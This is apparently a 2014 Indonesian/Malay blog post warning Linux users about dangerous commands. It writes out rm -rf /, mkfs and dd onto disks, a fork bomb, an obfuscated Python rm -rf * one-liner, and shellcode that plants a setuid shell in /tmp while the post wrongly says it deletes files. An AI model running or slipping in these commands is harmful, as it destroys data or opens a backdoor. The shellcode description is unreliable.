Sunday, 13 April 2014

7 PERINTAH-PERINTAH BERBAHAYA DI LINUX




Assalamualaikum.. & Salam Sejahatera  

                             
Terdapat banyak artikel yang membahas “7 perintah berbahaya di linux”, sebenarnya ada lebih dari 7. Dan yang berbahaya sebenarnya bukanlah perintahnya melainkan kelalaian user ketika menggunakan akses sebagai root, jadi sesungguhnya anda terbebas dari bahaya ini jika ketika anda menjadi root, anda berhati-hati.
Berikut adalah yang Encikdapat dari ubuntuguide, gunakan sebagai pelajaran dan bukan untuk kejahatan.

1. Mengahapus semua yang ada di derektori

rm -rf /
rm -rf .
rm -rf *



rm -rf / mungkin tidak akan berhasil jika anda tidak memiliki akses root seperti memakai sudo, namun rm -rf . dan rm -rf * dapat menghapus apa saja di direktori dengan akses user biasa, jadi hati-hati.

2. Reformat data di device


mkfs.ext3 /dev/sda2
mkfs.apasaja /dev/sda3


Kemungkinan tak akan berhasil tanpa akses root, dan kalau pun berhasil data masih bisa dikembalikan

3. Manipulasi block device


perintah_apa_saja > /dev/sda
dd if=apalah of=/dev/sda


Mengerikan, Encikbelum pernah cuba ini tapi terlihat jika anda mencuba salah satunya maka block awal device (atau harddisk) akan menjadi raw atau format yang tidak dketahui.

4. ForkBomb


:(){:|:&};:        di bash
fork while fork         di perl


Encik tidak paham  ini tapi ubuntuguide mengatakan perintah-perintah itu akan menyebabkan sistem menjadi hang.

5. Tarbomb

Menarik dunia linux, ternyata file tar archive oleh seseorang dapat digunakan untuk menginjeksi file-file ke dalam sistem atau dengan cara lain dapat menduplikat jutaan file. Pencegahannya, jika anda diminta untuk mengekstrak tar di derektori tertentu maka anda harus berhati-hati, ekstrak di direktori yang bersih, setelah yakin aman baru pindahkan pada direktori yang diminta.

6. Bom Decompression

File archive yang terlihat kecil namun saat didekompresi menjadi berukuran GB

7. Mengeksekusi script yang tidak jelas sumbernya

Banyak yang beranggapan Linux itu tahan atau anti virus, ini keliru karena tidak ada OS yang tahan virus dan bug. Linux jarang terkena virus karena penggunanya selalu mengeksekusi script dari sumber yang diketahui seperti dari repository distronya atau dari situs dipercaya seperti launchpad, sourforge misalnya. Contoh berikut adalah script python

python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'

dimana “sn!.sg!+” serupa dengan perintah rm -rf *. Jika dilihat script itu, bahkan yang mahir dengan python pun belum tentu menyadari bahayanya.

Contoh lain (Encik belum pernah cuba yang ini dan belum tahu cara menggunakannya):


char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
               = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
                 "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
                 "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
                 "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
                 "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
                 "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
                 "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
                 "cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

ubuntuguide mengatakan ini sama dengan rm -rf ~ / &.


#Sekian Terima Kasih
#Encik Ubuntu (Linux User)

    Choose :
  • OR
  • To comment
No comments:
Write comments